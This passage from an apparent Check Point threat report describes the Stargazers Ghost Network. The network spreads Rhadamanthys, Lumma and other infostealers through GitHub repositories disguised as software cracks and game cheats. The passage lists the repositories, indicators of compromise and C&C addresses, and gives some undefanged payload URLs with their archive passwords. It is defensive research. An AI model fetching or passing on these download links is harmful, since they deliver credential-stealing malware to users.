yessine-agrebi/AOMEI-Partition-Assistant-Cracked-Software\r\nAmerHashima/Voicemod-2024-Crack-Full-Version\r\nDanms661/NEAR-HOT-WALLET-AUTOBOT\r\nDanms661/SEED-SEARCHER-Crypto-Checker-30-Wallets\r\nDanms661/Top-Osu-Hacks-2024-Aim-Assist-Bots-and-More\r\nEssence-Of-Slimez-37/Pinnacle-Studio-Crack\r\nEssence-Of-Slimez-37/Pro-Tools-Crack\r\nEssence-Of-Slimez-37/ProtonVPN-Free-Crack-2024\r\nEssence-Of-Slimez-37/ReiBoot-Pro-Crack-Download-Free\r\nEssence-Of-Slimez-37/Revit-Crack\r\nEssence-Of-Slimez-37/Rhinoceros-Crack\r\nEssence-Of-Slimez-37/RisePro-Stealer-HVNC-Crack\r\nEssence-Of-Slimez-37/SEED-SEARCHER-Crypto-Checker-30-Wallets\r\nEssence-Of-Slimez-37/Simple-Checker-Crack\r\nEssence-Of-Slimez-37/Snapster-autobot\r\nEssence-Of-Slimez-37/SolidWorks-crack\r\nEssence-Of-Slimez-37/Sound-Forge-crack\r\nEssence-Of-Slimez-37/Steam-account-autoregger-creation-of-maFile\r\nEssence-Of-Slimez-37/Sublime-Text-crack\r\nEssence-Of-Slimez-37/TFT-Unlocker-Tool-FUll\r\nEssence-Of-Slimez-37/TeamViewer-Latest-Crack-2024\r\nEssence-Of-Slimez-37/The-unifier-is-both-Video\r\nEssence-Of-Slimez-37/Toon-Boom-Harmony-Crack\r\nEssence-Of-Slimez-37/Top-Osu-Hacks-2024-Aim-Assist-Bots-and-More\r\nEssence-Of-Slimez-37/Unity-Pro-Cracks\r\nEssence-Of-Slimez-37/VLC-Media-Player-Crack\r\nEssence-Of-Slimez-37/Vape-V4-Crack-Kangaroo\r\nEssence-Of-Slimez-37/Voicemod-2024-Crack-Full-Version\r\nEssence-Of-Slimez-37/Youtube-365-Auto-upload-cheat-checker\r\nEssence-Of-Slimez-37/ZBrush-Crack\r\nEssence-Of-Slimez-37/pixel-wallet-bot-free\r\nEssence-Of-Slimez-37/yescoin-bot-installation\r\nHeangHorn/Corel-Draw-Free-Crack-2024\r\nKnight-JNXU/Catizen-Auto-bot-autofarm\r\nMajor2000/Albion-2024\r\nMajor2000/EFT-ESP-hack\r\nMikeWoWOne/Fortnite-hack-version\r\nMikeWoWOne/GameMaker-Studio-2-Crack\r\nMikeWoWOne/HWID-spoofer-for-games\r\nMikeWoWOne/IObit-Uninstaller-Latest-Version-Crack\r\nMikeWoWOne/JetBrains-IntelliJ-IDEA-Crack\r\nMikeWoWOne/KMS-Auto-Windows-and-Office-Activator\r\nMikeWoWOne/Kiddions-mod-menu-gta-5\r\nMikeWoWOne/KuCoin-trading-bot\r\nMikeWoWOne/Lethal-Company-Hack\r\nMikeWoWOne/LoL-hack-script\r\nMikeWoWOne/Lumion-Crack\r\nMikeWoWOne/Magix-Music-Maker-Crack\r\nMikeWoWOne/Matlab-Crack\r\nMikeWoWOne/Movavi-Video-Editor-Pro-Crack-Download\r\nMikeWoWOne/NARAKA-BLADEPOINT-Hack-Free\r\nMikeWoWOne/NEAR-HOT-WALLET-AUTOBOT\r\nhttps://research.checkpoint.com/2024/stargazers-ghost-network/\r\nPage 30 of 45\n\nMikeWoWOne/Navisworks-Crack\r\nMikeWoWOne/Nero-Burning-ROM-Crack\r\nMikeWoWOne/NordVPN-Pro-Crack-Full-Version\r\nMikeWoWOne/hamster-kombat-bot-free\r\nMikeWoWOne/memefi-coin-crypto-bot\r\nMolano11/Nero-Burning-ROM-Crack\r\nMolano11/Youtube-365-Auto-upload-cheat-checker\r\nOzkaynak-Sucuk/1inch-bot\r\nOzkaynak-Sucuk/ARK-radar-hack\r\nOzkaynak-Sucuk/Albion-2024\r\nOzkaynak-Sucuk/Apex-2024\r\nOzkaynak-Sucuk/Autodesk-Maya-Crack\r\nOzkaynak-Sucuk/BitMEX-trading-bot\r\nOzkaynak-Sucuk/Bitfinex-bot\r\nOzkaynak-Sucuk/Blum-auto-bot\r\nOzkaynak-Sucuk/Coinbase-pro-trading-bot\r\nOzkaynak-Sucuk/Cs-2-Hack-Skinchanger\r\nOzkaynak-Sucuk/Discord-Nitro-Alt-Generator-Free\r\nOzkaynak-Sucuk/Driver-Booster-Pro-License-Key-Crack\r\nOzkaynak-Sucuk/Fc-24-Hack-Free\r\nOzkaynak-Sucuk/FiveM-Hacks-2024\r\nOzkaynak-Sucuk/Fixing-Error-kernelbase\r\nOzkaynak-Sucuk/Fortnite-hack-version\r\nSpacyXyt/Cinema-4D-Crack\r\nSpacyXyt/LoL-hack-script\r\nV-arc/Silverfish\r\nbatuhanodbs/FiveM-Hacks-2024\r\nblackvn05/ReiBoot-Pro-Crack-Download-Free\r\ndblancolascarez/CCleaner-Crack\r\njgprimaki/Microsoft-Office-2024-Cracked-Version\r\njzhou8881/Discord-Nitro-Alt-Generator-Free\r\njzhou8881/Driver-Booster-Pro-License-Key-Crack\r\njzhou8881/EFT-ESP-hack\r\njzhou8881/ESET-NOD32-Antivirus-Crack\r\njzhou8881/Earnings-on-CS2-trades-CS-Trading-helper-Buff163\r\njzhou8881/Fc-24-Hack-Free\r\njzhou8881/Filmora-License-Key-Crack-Download\r\njzhou8881/FiveM-Hacks-2024\r\njzhou8881/Fivem-Hack-undetected\r\njzhou8881/Fixing-Error-0x80004005-Unspecified\r\njzhou8881/Fixing-Error-0x80070002\r\njzhou8881/Fixing-Error-0x80070005-Access-Denied\r\njzhou8881/Fixing-Error-0x8007000E\r\njzhou8881/Fixing-Error-0x80070057-Invalid-Parameter\r\njzhou8881/Fixing-Error-0x80070424-Specified-Service\r\njzhou8881/Fixing-Error-0x80070570\r\njzhou8881/Fixing-Error-0x80072EE7\r\njzhou8881/Fixing-Error-0x8015DC12\r\njzhou8881/Fixing-Error-0x803F8001\r\njzhou8881/Fixing-Error-0x887A0005-DirectX\r\njzhou8881/Fixing-Error-0x887A0020\r\njzhou8881/Fixing-Error-0xC000007B\r\njzhou8881/Fixing-Error-0xC0000142\r\njzhou8881/Fixing-Error-0xc0000005\r\njzhou8881/Fixing-Error-0xc00000ba\r\njzhou8881/Fixing-Error-BEX\r\nhttps://research.checkpoint.com/2024/stargazers-ghost-network/\r\nPage 31 of 45\n\njzhou8881/Fixing-Error-d3dx9-43-dll\r\njzhou8881/Fixing-Error-kernelbase\r\njzhou8881/Fortnite-hack-version\r\njzhou8881/Free-Crypto-Trading-Bot-Download\r\nlixvr/1inch-bot\r\nlixvr/BitMEX-trading-bot\r\nlixvr/KuCoin-trading-bot\r\nlixvr/Sandbox-CryptoBot\r\nlixvr/eTukTuk-CryptoBot\r\nteenjay/Sound-Forge-crack\r\nteenjay/Steam-account-autoregger-creation-of-maFile\r\nteenjay/Sublime-Text-crack\r\nteenjay/TFT-Unlocker-Tool-FUll\r\nteenjay/TeamViewer-Latest-Crack-2024\r\nteenjay/The-unifier-is-both-Video\r\nteenjay/Toon-Boom-Harmony-Crack\r\nteenjay/Top-Osu-Hacks-2024-Aim-Assist-Bots-and-More\r\nteenjay/TradingView-scripts\r\nteenjay/Uniswap-bot\r\nteenjay/Unity-Pro-Cracks\r\nteenjay/VLC-Media-Player-Crack\r\nteenjay/Vape-V4-Crack-Kangaroo\r\nteenjay/Youtube-365-Auto-upload-cheat-checker\r\nteenjay/ZBrush-Crack\r\nteenjay/xBLAST-auto-bot\r\nteenjay/yescoin-bot-installation\r\nyCodezao/Microsoft-Office-2024-Cracked-Version\r\nyCodezao/Microsoft-Project-Crack\r\nyCodezao/NZT-Poker-AI-Bot-17-Rooms-Cash-Fish-Monitor\r\nyCodezao/Notcoin-crypto-bot\r\nyCodezao/Parallels-Desktop-Crack\r\nyCodezao/Path-Of-Exile-Hack\r\nyCodezao/Pinnacle-Studio-Crack\r\nyCodezao/PlayDoge-Auto-Farm-and-Bot-Setup\r\nyCodezao/Pro-Tools-Crack\r\nyCodezao/ProtonVPN-Free-Crack-2024\r\nyCodezao/ReiBoot-Pro-Crack-Download-Free\r\nyCodezao/Revit-Crack\r\nyCodezao/Rhinoceros-Crack\r\nyCodezao/RisePro-Stealer-HVNC-Crack\r\nyCodezao/SEED-SEARCHER-Crypto-Checker-30-Wallets\r\nyCodezao/Sandbox-CryptoBot\r\nyCodezao/ShibaShootout-CryptoBot\r\nyCodezao/Snapster-autobot\r\nyCodezao/SolidWorks-crack\r\nyCodezao/cs2-hvh\r\nyCodezao/pixel-wallet-bot-free\r\nySunSh1ne/JetBrains-IntelliJ-IDEA-Crack\r\nyessine-agrebi/AOMEI-Partition-Assistant-Cracked-Software\r\nWe observed direct external links to malicious scripts or links redirecting to another GitHub repository release, but threat\r\nactors also utilized short links like goo.su and bit.ly . Searching the previously mentioned short-link domains, we\r\nobtained around 400 repositories.\r\nhttps://research.checkpoint.com/2024/stargazers-ghost-network/\r\nPage 32 of 45\n\nFigure 24 – Results with “Download” and short-links.\r\nThe short Download link redirects the victims to download an archive file from maestrascreciendoenamor.com/Loader-Installers.zip . Another short link, goo.su/rH3n , also redirects this URL, making a total of 142 repositories distribute\r\nthe below GO downloader.\r\n802CBDBB7C195DAD3F763C38F21900A9006DB3292FFFC723B3CF75C10D239EA9 Loader-Installers\\\\CFG.ini\r\nB624949DF8B0E3A6153FDFB730A7C6F4990B6592EE0D922E1788433D276610F3 Loader-Installers\\\\DriverUP.dll\r\n060DE3B4CF3056F24DE882B4408020CEE0510CB1FF0E5007C621BC98E5B4BDF3 Loader-Installers\\\\Loader\r\nInstaller.exe\r\n802CBDBB7C195DAD3F763C38F21900A9006DB3292FFFC723B3CF75C10D239EA9 Loader-Installers\\\\CFG.ini\r\nB624949DF8B0E3A6153FDFB730A7C6F4990B6592EE0D922E1788433D276610F3 Loader-Installers\\\\DriverUP.dll\r\n060DE3B4CF3056F24DE882B4408020CEE0510CB1FF0E5007C621BC98E5B4BDF3 Loader-Installers\\\\Loader\r\nInstaller.exe\r\n802CBDBB7C195DAD3F763C38F21900A9006DB3292FFFC723B3CF75C10D239EA9 Loader-Installers\\\\CFG.ini\r\nB624949DF8B0E3A6153FDFB730A7C6F4990B6592EE0D922E1788433D276610F3 Loader-Installers\\\\DriverUP.dll\r\n060DE3B4CF3056F24DE882B4408020CEE0510CB1FF0E5007C621BC98E5B4BDF3 Loader-Installers\\\\Loader Installer.exe\r\nThe downloader makes a GET request that appears to register the bot’s IP address and generate campaign statistics:\r\n147.45.44.73:1445/bibika1337?reason= . When we visit the link, we see a page in Russian-language that mentions the\r\nnumber of launched downloaders (the last stats before clean action).\r\nRussian English No\r\nЗапущено всего Total launched 1123\r\nЗапущено за две недели Launched in two weeks 1061\r\nЗапущено за неделю Launched in a week 621\r\nЗапущено за 2дня Launched in 2 days 131\r\nЗапущено за день Launched in a day 44\r\nIn just 2 weeks, Rhadamanthys infected more than 1050 victims while being distributed via the Stargazers Ghost\r\nNetwork.\r\nhttps://research.checkpoint.com/2024/stargazers-ghost-network/\r\nPage 33 of 45\n\nFigure 25 – Campaign statistics.\r\nFollowing two more GET requests, the victim downloads two password-protected archives:\r\n1. 147.45.44.73:1488/moa/Tricky2.rar\r\n2. 89.23.98.116:1444/Tricky.rar\r\nFigure 26 – Multiple password-protected archives are stored inside those directories.\r\nFigure 27 – Two archives are stored, the last one from 2024-06-09.\r\nhttps://research.checkpoint.com/2024/stargazers-ghost-network/\r\nPage 34 of 45\n\nBoth of the archives are decrypted using the same password, yanabibika .\r\nFigure 28 – Password-protected archive unpacking.\r\n938554DB472202C51069B3590820456EB37EC3680B555D1DE532623E01468D47 Tricky2\\\\withya_MrAnon.cmd\r\n64A49FF6862B2C924280D5E906BC36168112C85D9ACC2EB778B72EA1D4C17895 Tricky\\\\prezi-desktop-6-26-0.exe\r\n938554DB472202C51069B3590820456EB37EC3680B555D1DE532623E01468D47 Tricky2\\\\withya_MrAnon.cmd\r\n64A49FF6862B2C924280D5E906BC36168112C85D9ACC2EB778B72EA1D4C17895 Tricky\\\\prezi-desktop-6-26-0.exe\r\n938554DB472202C51069B3590820456EB37EC3680B555D1DE532623E01468D47 Tricky2\\\\withya_MrAnon.cmd\r\n64A49FF6862B2C924280D5E906BC36168112C85D9ACC2EB778B72EA1D4C17895 Tricky\\\\prezi-desktop-6-26-0.exe\r\nThe executable inside the archive is the GO loader for Rhadamanthys, which is injected into\r\nC:\\\\Windows\\\\BitLockerDiscoveryVolumeContents\\\\BitLockerToGo.exe and later communicates with its C\u0026C,\r\n147.78.103.199:2529 .\r\nThe GitHub repositories for the Atlantida campaign and the Rhadamanthys were created around the same time. The\r\nearliest Rhadamanthys repository was created on 2024-05-30T18:51:26Z . The network operator employed around 120\r\nGitHub accounts for this campaign.\r\nhttps://research.checkpoint.com/2024/stargazers-ghost-network/\r\nPage 35 of 45\n\nFigure 29 – Accounts per Action.\r\nAnother interesting discovery occurred when we further examined the commits and forked accounts. On 2021-02-\r\n11T02:41:40Z (not a typo, it is indeed 2021), the repository V-arc/Silverfish ( 53041402+V-arc@users.noreply.github.com/71246462@qq.com ) was created and, between February and August 2021, was forked by 25\r\nother accounts. On 2024-06-02T09:06:59Z , V-arc updated the original README.md file now containing the phishing link\r\ndistributing Rhadamanthys. Two of the 25 forked repositories applied commit from the original repository. The reason for\r\nchoosing to “infect” that specific repository is due to the fact that it is the most popular one owned by this account.\r\nFigure 30 – Updating last commit from 2021-02-13T15:41:31Z. \r\nV-arc GitHub account was created on 2019-07-18T09:42:29Z but was updated on 2024-05-31T11:14:43Z . We aren’t\r\nsure exactly what kind of update occurred, but possibly generated a new GPG key. As expected, the account also has a\r\nrepository with the pattern # V-arc1\\n1 created on 2024-06-08T19:03:31Z . The initial commit on the malicious\r\nrepository was possibly made using the Web interface on 2021-02-11T02:41:40Z in the timezone UTC+8 . The rest of the\r\ncommits around the same time (in day(s)) possibly happened from a local environment on 2021-02-11T02:44:59Z , 2021-\r\n02-11T06:25:26Z , and the last legitimate commit on 2021-02-13T15:41:31Z . While all the “initial” commits happened in\r\nthe timezone UTC+8 , the last malicious commit in 2024 occurred on UTC+3 . We consider it highly unlikely that the\r\nrepository started as malicious and only started pushing malware 3 years later. Possibly, the account was compromised and\r\nthen was included in the Stargazers Ghost Network. With that bit of information, we consider the ~1100\r\naccounts/repositories with the pattern # {username}1\\n1 a test of compromised accounts credentials/rights.\r\nhttps://research.checkpoint.com/2024/stargazers-ghost-network/\r\nPage 36 of 45\n\nAccording to the campaign statistics, 687 of the activities on malicious repositories distributing the GO downloader\r\noccurred on May 31, 2024, indicating the campaign’s start date.\r\nFigure 31 – Rhadamanthys campaign, GitHub accounts activities.\r\nThe authors of the README.md files that were forked by the rest of the accounts:\r\nCommit Date\r\nCommit\r\nAuthor\r\nCommit Email\r\nRepository\r\nOwner\r\nNo\r\nMaliciou\r\nReposito\r\n2024-05-\r\n29T20:55:01Z\r\nGMT+0\r\nbatuhanodbs 104384818+batuhanodbs@users.noreply.github.com batuhanodbs 1\r\n2024-05-\r\n29T21:00:55Z\r\nGMT+0\r\nHeangHorn 75545632+HeangHorn@users.noreply.github.com HeangHorn 1\r\n2024-05-\r\n29T21:09:37Z\r\nGMT+0\r\ndblancolascarez 107002366+dblancolascarez@users.noreply.github.com dblancolascarez 1\r\n2024-05-\r\n29T21:15:46Z\r\nGMT+0\r\nyessine-agrebi 59874615+yessine-agrebi@users.noreply.github.com yessine-agrebi 1\r\n2024-05-\r\n30T11:59:15Z\r\nGMT+0\r\nSpacyXyt 80075528+SpacyXyt@users.noreply.github.com SpacyXyt 2\r\nhttps://research.checkpoint.com/2024/stargazers-ghost-network/\r\nPage 37 of 45\n\nCommit Date\r\nCommit\r\nAuthor\r\nCommit Email\r\nRepository\r\nOwner\r\nNo\r\nMaliciou\r\nReposito\r\n2024-05-\r\n30T18:51:26Z\r\nGMT+0\r\nEssence-Of-Slimez-37120878149+Essence-Of-Slimez-37@users.noreply.github.comEssence-Of-Slimez-37\r\n27\r\n2024-05-\r\n30T19:40:27Z\r\nGMT+0\r\nMajor2000 majormadobe@gmail.com Major2000 2\r\n2024-05-\r\n31T13:48:49Z\r\nGMT+0\r\nMolano11 124221765+Molano11@users.noreply.github.com Molano11 2\r\n2024-05-\r\n31T15:21:05Z\r\nGMT+0\r\nDanms661 dnsrm9787@gmail.com Danms661 3\r\n2024-05-\r\n31T21:50:08Z\r\nGMT+0\r\nblackvn05 62129353+blackvn05@users.noreply.github.com blackvn05 1\r\n2024-06-\r\n01T12:55:33Z\r\nGMT+0\r\nySunSh1ne 113144625+ySunSh1ne@users.noreply.github.com ySunSh1ne 1\r\n2024-06-\r\n01T12:56:02Z\r\nGMT+0\r\nAmerHashima 43539190+AmerHashima@users.noreply.github.com AmerHashima 1\r\n2024-06-\r\n01T12:56:45Z\r\nGMT+0\r\njgprimaki 93926139+jgprimaki@users.noreply.github.com jgprimaki 1\r\n2024-06-\r\n02T09:06:59Z\r\nGMT+3\r\nV-arc 53041402+V-arc@users.noreply.github.com V-arc 1\r\nStargazer Goblin and Malware Distributed via Network\r\nComparing the two campaigns, the difference in links and modus operandi, despite both being “starred” and “forked” by the\r\nsame accounts, leads us to believe that the Stargazers Ghost Network functions as a Malware/Link Distribution as a\r\nService (DaaS). In this model, threat actors share their malicious links or malware, possibly at different prices, and\r\ndistribute them through these malicious GitHub repositories and “legitimized” by the Stargazer accounts. Check Point\r\nResearch is tracking the threat actor/group behind this service as Stargazer Goblin. This group provides, operates, and\r\nmaintains the Stargazers Ghost Network, which distributes malicious links or malware via their Ghost GitHub accounts.\r\nMalware families distributed via the network include:\r\nAtlantida Stealer\r\nRhadamanthys\r\nhttps://research.checkpoint.com/2024/stargazers-ghost-network/\r\nPage 38 of 45\n\nLumma Stealer\r\nRedLine\r\nRisePro\r\nSince the beginning of June 2024, we observed 211 unique still active repositories pushing malicious links, compared to 135\r\nactive from May. Since May 2024, GitHub has taken down approximately 1559 repositories and their related GitHub\r\naccounts.\r\nFigure 32 – Active repositories per last update date. \r\nFrom the accounts we have been tracking, 8 different accounts have bestowed 530 stars to repositories. While we do not\r\nhave access to all the starred repositories as old ones were taken down, all of them were updated around the same date\r\n2024-05-31T19:00:32Z :\r\n@Pids134, @rego321, @Molano11, @nepalhack, @PeeKhaye, @Ozgur010101, @posyshp, @ProfessorAMi\r\n@Pids134, @rego321, @Molano11, @nepalhack, @PeeKhaye, @Ozgur010101, @posyshp, @ProfessorAMi\r\n@Pids134, @rego321, @Molano11, @nepalhack, @PeeKhaye, @Ozgur010101, @posyshp, @ProfessorAMi\r\nWhile none of the accounts we mention could provide us with information on when the network was created, there is an\r\naccount whose name indicates its purpose as part of the network. @StarGhostSG , with 253 starred repositories, was created\r\non 2022-08-31T00:05:25Z . This is the creation date, but the network could have been either under development or already\r\noperating on a smaller scale during that time.\r\nDark-Web Forums\r\nWhile searching Dark Web forums, we found an advertisement from July 8, 2023, promoting the described network. The\r\nadvertisement banner is written in both English and Russian. According to the post, this account offers services for starring,\r\nfollowing, forking, and watching GitHub accounts and repositories, as well as fulfilling any other requested actions on\r\nGitHub.\r\nhttps://research.checkpoint.com/2024/stargazers-ghost-network/\r\nPage 39 of 45\n\nFigure 33 – The first advertisement was on 2023-07-08.\r\nThe prices vary depending on the services provided. For example, starring a repository with 100 accounts costs $10, with a\r\nrate of 10 stars per USD. Providing a trusted account with an “aged” repository costs $2. Discounts are available for\r\npurchases over $500.\r\nFigure 34 – Service details and prices.\r\nBased on this information and the number of repositories and actions that occurred from mid-May to mid-June 2024,\r\nCheck Point Research calculated Stargazer Goblin‘s potential profit to be approximately $8,000. We believe that more\r\nactions and repositories took place during this time, making the calculated profit just a fraction of the actual profit.\r\nConsidering that Stargazers Ghost Network has operated publicly since July 2023 and likely on a smaller scale since\r\nAugust 2022, we estimate the total profit to be approximately $100,000 for the entire lifespan of Stargazers Ghost\r\nNetwork. GitHub could probably produce a more accurate estimation of the profit, as they have more insights into the\r\nactions that occurred on banned accounts and repositories.\r\nPast, Present, and Future Ghosts Networks\r\nCheck Point Research, based on intelligence, considered it highly probable that GitHub Ghost accounts are only one part\r\nof the grand picture, with other Ghost accounts operating on different platforms as an integral part of an even larger\r\nDistribution as a Service universe. This theory gained support when we discovered a GitHub repository sharing a link to an\r\nhttps://research.checkpoint.com/2024/stargazers-ghost-network/\r\nPage 40 of 45\n\nunlisted YouTube video. The video instructs potential victims how to download and install a supposedly “free” version of\r\nAdobe Photoshop.\r\nFigure 35 – GitHub account with download and YouTube links. \r\nIn the YouTube video, the threat actor is seen downloading a password-protected archive from clouds-folder[.]com ,\r\nextracting it using the password 2424 , and then proceeding to execute the installer (Lumma Stealer). During our careful\r\nexamination of the video, we identified the full path to the dist folder,\r\nC:\\\\Users\\\\Peresvet\\\\DevelNextProjects\\\\test\\\\build\\\\dist .\r\nFigure 36 – Ghost YouTube Account and malicious unlisted Video.\r\nThe YouTube Ghost account also comments on its own video. Additionally, we observed the actual owner of the\r\ncompromised GitHub account, @ANGEOM21 , replying to one of the Ghost’s comments. This interaction validates our\r\nprevious assumption that many of the accounts in the Stargazers Ghost Network are compromised.\r\nhttps://research.checkpoint.com/2024/stargazers-ghost-network/\r\nPage 41 of 45\n\nFigure 37 – YouTube Ghost account’s video comment section.\r\nWe believe that Stargazer Goblin created a universe of Ghost accounts operating across various platforms such as\r\nGitHub, Twitter, YouTube, Discord, Instagram, Facebook, and many others. This further leads us to believe that the\r\nAtlantida Stealer campaigns, which specifically targeted social media-oriented users, could have been performed by\r\nStargazer Goblin to obtain accounts for the Ghost networks. Similar to GitHub, other platforms can be utilized to\r\nlegitimize malicious phishing and distribute links and malware to victims through posts, repositories, videos, tweets, and\r\nchannels, depending on the features each platform offers.\r\nFuture Ghost accounts could potentially utilize Artificial Intelligence (AI) models to generate more targeted and diverse\r\ncontent, from text to images and videos. By considering targeted users’ replies, these AI-driven accounts could promote\r\nphishing material not only through standardized templates but also through customized responses tailored to real users’\r\nneeds and interactions. A new era of malware distribution is here, where we expect these types of operations to occur more\r\nfrequently, making it increasingly difficult to distinguish legitimate content from malicious material.\r\nConclusion\r\nStargazer Goblin created an extremely sophisticated malware distribution operation that avoids detection as GitHub is\r\nconsidered a legitimate website, bypasses suspicions of malicious activities, and minimizes and recovers any damage when\r\nGitHub disrupts their network. Utilizing multiple accounts and profiles performing different activities from starring to\r\nhosting the repository, committing the phishing template, and hosting malicious releases, enables the Stargazers Ghost\r\nNetwork to minimize their losses when GitHub performs any actions to disturb their operations as usually only one part of\r\nthe whole operation is disrupted instead of all the involved accounts.\r\nThe campaigns performed by the Stargazers Ghost Network and malware distributed via this service are extremely\r\nsuccessful. In a short period of time, thousands of victims installed software from what appears to be a legitimate repository\r\nwithout suspecting any malicious intent. The heavily victim-oriented phishing templates allow threat actors to infect victims\r\nwith specific profiles and online accounts, making the infections even more valuable.\r\nThe actual number of accounts performing various network operations is unclear, as the network is constantly evolving. Our\r\nlatest calculations suggest there are more than 3,000 Ghost accounts. Considering a campaign of approximately 30\r\nrepositories utilizing around 380 Ghost accounts, the total number may be even higher. While GitHub does ban suspect\r\naccounts in many cases, the operations run uninterrupted for a long time before those measures are taken.\r\nSome of the Ghost accounts appear to have been created by the operators, while others seem to be compromised “normal”\r\nGitHub accounts. This makes GitHub credentials valuable in underground marketplaces, as the network also incorporates\r\nsuch accounts. The addition of compromised accounts into the network makes it challenging to estimate when Stargazer\r\nGoblin started their malicious activities. As it is difficult to easily separate clear malicious activities from normal users ones.\r\nHowever, based on some core accounts, we consider August 2022 to be when the network development began and/or was\r\nhttps://research.checkpoint.com/2024/stargazers-ghost-network/\r\nPage 42 of 45\n\nworking on a smaller scale. The first public advertisement of Stargazers Ghost Network occurred the following year, on\r\nJuly 8, 2023. The total estimated profit for Stargazer Goblin is estimated at $100,000.\r\nWe are entering a new era of malware distribution, where ghost accounts organically promote and distribute malicious links\r\nacross various platforms. Future ghost accounts powered by artificial intelligence could launch even more targeted\r\ncampaigns, making it increasingly difficult to distinguish between legitimate content and malicious material.\r\nRecommendations\r\nGitHub has been long used for malicious activities, though the introduction of this network in the attack makes it fairly\r\ndifficult for normal users to detect suspicious repositories. To mitigate the risks of being affected by such threats, it is\r\nessential to:\r\n1. Keep operating systems and applications updated through timely patches and other means.\r\n2. Be cautious of unexpected emails/messages with links, especially from unknown senders.\r\n3. Enhance cybersecurity awareness among employees.\r\n4. Consult security specialists for any doubts or uncertainties.\r\nProtection\r\nCheck Point Threat Emulation and Harmony Endpoint provide comprehensive coverage of attack tactics, file types, and\r\noperating systems and protect its customers against this type of attack and malware families described in this report.\r\nInfoStealer.Win.Atlantida.*\r\nTrojan.WIN32.AtlantidaStealer.A\r\nTrojan.WIN32.AtlantidaStealer.B\r\nInfoStealer.Wins.Lumma.ta.S\r\nInfoStealer.Wins.Lumma.ta.T\r\nInfoStealer.Wins.Lumma.ta.U\r\nInfoStealer.Win.Lumma.N\r\nInfoStealer.Win.Lumma.O\r\nInjector.Win.RunPE.C\r\nLoader.Wins.GoBitLoader.A\r\nTrojan.Wins.Imphash.taim.LV\r\nTrojan.Win32.RedLine Stealer.TC.6a9fRQRh\r\nInfoStealer.Wins.Redline.ta.BY\r\nIOCs\r\nDescription Value\r\nAtlantida –\r\nHTA\r\n2B6C8AA2AC917D978DFEC53CEF70EACA36764A93D01D93786CC0D84DA47CE8E6\r\nAtlantida –\r\nMHTML\r\n385EBE3D5BD22B6A5AE6314F33A7FA6AA24814005284C79EDAA5BDCF98E28492\r\nAtlantida –\r\nPowershell\r\n2EBF051F6A61FA825C684F1D640BFB3BD79ADD0AFCFF698660F83F22E6544CBA\r\nAtlantida –\r\n.NET Injector\r\nAB59A8412E4F8BF3A7E20CD656EDACF72E484246DFB6B7766D467C2A1E4CDAB0\r\nhttps://research.checkpoint.com/2024/stargazers-ghost-network/\r\nPage 43 of 45\n\nDescription Value\r\nAtlantida –\r\nC\u0026C\r\n185.172.128[.]95\r\nRhadamanthys\r\n– GO\r\ndownloader\r\n060DE3B4CF3056F24DE882B4408020CEE0510CB1FF0E5007C621BC98E5B4BDF3\r\nRhadamanthys\r\n– GO\r\ndownloader –\r\nC\u0026Cs\r\n147.45.44[.]73[:]1488\r\n89.23.98[.]116[:]1444\r\nRhadamanthys\r\n– GO Loader\r\n64A49FF6862B2C924280D5E906BC36168112C85D9ACC2EB778B72EA1D4C17895\r\nRhadamanthys\r\n– C\u0026C\r\n147.78.103[.]199[:]2529\r\nLumma\r\nStealer\r\n148C456E83E746A63E54EC5ABDA801731C42F3778E8EB0BF5A5C731B9A48C45D\r\n2F5624DCDA1D58A45491028ACC63FF3F1F89F564015813C52EEBD80F51220383\r\n98B7488B1A18CB0C5E360C06F0C94D19A5230B7B15D0616856354FB64929B388\r\nA484FA09BE45608E23D8E67CD28675FA3E3C4111AF396501385256CE34FF1D95\r\nLumma –\r\nC\u0026Cs\r\nhxxps://considerrycurrentyws[.]shop\r\nhxxps://deprivedrinkyfaiir[.]shop\r\nhxxps://detailbaconroollyws[.]shop\r\nhxxps://distincttangyflippan[.]shop\r\nhxxps://greentastellesqwm[.]shop\r\nhxxps://horsedwollfedrwos[.]shop\r\nhxxps://innerverdanytiresw[.]shop\r\nhxxps://lamentablegapingkwaq[.]shop\r\nhxxps://macabrecondfucews[.]shop\r\nhxxps://messtimetabledkolvk[.]shop\r\nhxxps://patternapplauderw[.]shop\r\nhxxps://relaxtionflouwerwi[.]shop\r\nhxxps://sideindexfollowragelrew[.]pw\r\nhxxps://slamcopynammeks[.]shop\r\nhxxps://standingcomperewhitwo[.]shop\r\nhxxps://stickyyummyskiwffe[.]shop\r\nhxxps://sturdyregularrmsnhw[.]shop hxxps://understanndtytonyguw[.]shop\r\nhxxps://vivaciousdqugilew[.]shop\r\nRedLine\r\nStealer\r\n8D8D7EB1180C13ED629DCEAC6C399C656692A6476C49047E0822BEC6156A253A\r\nRedLine –\r\nC\u0026C\r\n147.45.47[.]64[:]11837\r\nBLOGS AND PUBLICATIONS\r\nhttps://research.checkpoint.com/2024/stargazers-ghost-network/\r\nPage 44 of 45\n\nCheck Point Research Publications\r\nGlobal Cyber Attack Reports\r\nThreat Research\r\nFebruary 17, 2020\r\n“The Turkish Rat” Evolved Adwind in a Massive Ongoing Phishing Campaign\r\nWe value your privacy!\r\nBFSI uses cookies on this site. We use cookies to enable faster and easier experience for you. By continuing to visit this\r\nwebsite you agree to our use of cookies.\r\nSource: https://research.checkpoint.com/2024/stargazers-ghost-network/\r\nhttps://research.checkpoint.com/2024/stargazers-ghost-network/\r\nPage 45 of 45", "extraction_quality": 1, "language": "EN", "sources": [ "MISPGALAXY", "Malpedia" ], "references": [ "https://research.checkpoint.com/2024/stargazers-ghost-network/" ], "report_names": [ "stargazers-ghost-network" ], "threat_actors": [ { "id": "9041c438-4bc0-4863-b89c-a32bba33903c", "created_at": "2023-01-06T13:46:38.232751Z", "updated_at": "2026-04-10T02:00:02.888195Z", "deleted_at": null, "main_name": "Nitro", "aliases": [ "Covert Grove" ], "source_name": "MISPGALAXY:Nitro", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "a2b44a04-a080-4465-973d-976ce53777de", "created_at": "2022-10-25T16:07:23.911791Z", "updated_at": "2026-04-10T02:00:04.786538Z", "deleted_at": null, "main_name": "Nitro", "aliases": [ "Covert Grove", "Nitro" ], "source_name": "ETDA:Nitro", "tools": [ "AngryRebel", "Backdoor.Apocalipto", "Chymine", "Darkmoon", "Farfli", "Gen:Trojan.Heur.PT", "Gh0st RAT", "Ghost RAT", "Moudour", "Mydoor", "PCClient", "PCRat", "Poison Ivy", "SPIVY", "Spindest", "pivy", "poisonivy" ], "source_id": "ETDA", "reports": null }, { "id": 